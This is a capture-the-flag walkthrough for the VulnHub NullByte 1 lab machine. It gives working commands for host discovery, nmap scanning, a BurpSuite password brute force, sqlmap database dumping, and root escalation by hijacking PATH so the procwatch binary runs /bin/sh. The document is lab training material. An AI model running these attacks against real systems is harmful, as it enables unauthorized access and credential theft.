introduce
Series: NullByte (1 unit in this series)
Release date: August 1, 2015
Difficulty: Beginner
Running environment: Virtualbox
Goal: Obtain Root permissions
Learning:
- nmap missing scan script
- Brute force cracking
- SQL injection
- Environment variable privilege escalation
Target address: https://www.vulnhub.com/entry/nullbyte-1,126/
collect message
netdiscover host discovery
sudo netdiscover -i eth1 -r 192.168.56.0/24
Host information detection
found that SSH is running on port 777
nmap -p- 192.168.56.109
nmap -p 80,111,777,56412 -A 192.168.56.109
nmap -p 80,111,777,56412 --script=vuln 192.168.56.109
Website detection
When you open the website, you will see an image, and the image address is in the page source code.
Directory blasting didn't find any valuable information, so let's take a look at the picture first, and found a string of characters.
wget http://192.168.56.109/main.gif
exiftool main.gif
After trying it, I found that this is a website directory, and it seems that a password is required to log in.
Brute force cracking
Use BurpSuite for brute force cracking. The dictionary selected is rockyou, but this dictionary is too large, so I used \SecLists-2023.1\Passwords\Leaked-Databases\rockyou-70.txt in SecLists to crack the password:
elite
SQL injection
After logging in, it is found that there is SQL injection. After checking, it is found that there is no cookie. Then it is easy to handle. Just run sqlmap.
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --tables
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --columns
sqlmap -u "http://192.168.56.109/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth -T users --dump
This ciphertext cannot be decoded directly. After trying it, I found that it can be base64 decoded. Finally, the corresponding plaintext is: omega
SSH login
Elevate privileges
Based on the command line history, a suspicious executable file was easily found. Try running and find that this file will call other files
Way 1
Duplicate a terminal and tamper with environment variables
./procwatch
cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
./procwatch
Way 2
Create a new terminal locally and modify the environment variables
echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch